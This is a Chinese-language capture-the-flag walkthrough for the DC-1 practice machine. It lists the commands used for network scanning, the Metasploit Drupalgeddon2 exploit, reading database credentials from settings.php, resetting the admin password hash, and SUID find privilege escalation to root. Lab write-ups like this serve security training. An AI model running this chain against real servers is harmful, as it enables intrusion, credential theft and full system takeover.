DC-1
本机IP地址:192.168.138.128 设置中,网络适配器调成NAT
Netdiscover -r 192.168.138.128(或192.168.138.1/24) 扫描靶机地址
靶机IP:192.168.138.129
扫描靶机存活端口 Nmap -sV -p- 192.168.138.129 可以看到http服务的80端口 查看80端口 返回kali终端 输入whatweb -v 192.168.138.129 (扫描一些详细信息) 扫描完成后 再输入Msfconsole 进入msf6 进入msfconsole 输入下面指令进入模块 msf6 > use exploit/unix/webapp/drupal_drupalgeddon2(exploit→漏洞模块攻击的代码) 后续输入 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 如下 再输入 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show payloads 再输入 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.138.129 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit sysinfo shell Id python -c 'import pty; pty.spawn("/bin/bash")' (必背) 输入ls查看所有文件 ls 发现flag1值啦 输入 cat flag1.txt (cat意思“打开”) 打开flag1.txt文件瞅瞅就行了
find . -name "set*" find . -name "set*" ./sites/default/settings.php cat ./sites/default/settings.php mysql -udbuser -pR0ck3t 进入数据库 mysql> show databases; mysql> use drupaldb mysql> shop tables; mysql> show tables; mysql> select * from user mysql> select * from users\G;
mysql> exit find . -name "*hash*" ./scripts/password-hash.sh
./scripts/password-hash.sh 123456 再进数据库 mysql> use drupaldb mysql> update users set pass=’略’where name="admin"; flag3在网站中,使用修改后的密码登录网站后就能发现。
cat /etc/password cat /etc/passwd cd /home/flag4 ls cat flag4.txt flag4也就出来了
接下来使用find提权
find / -perm -u-s -type f 2>/dev/null
find ./ -exec “/bin/sh”
获得root权限 查看root目录中的thefinalflag.txt
End
|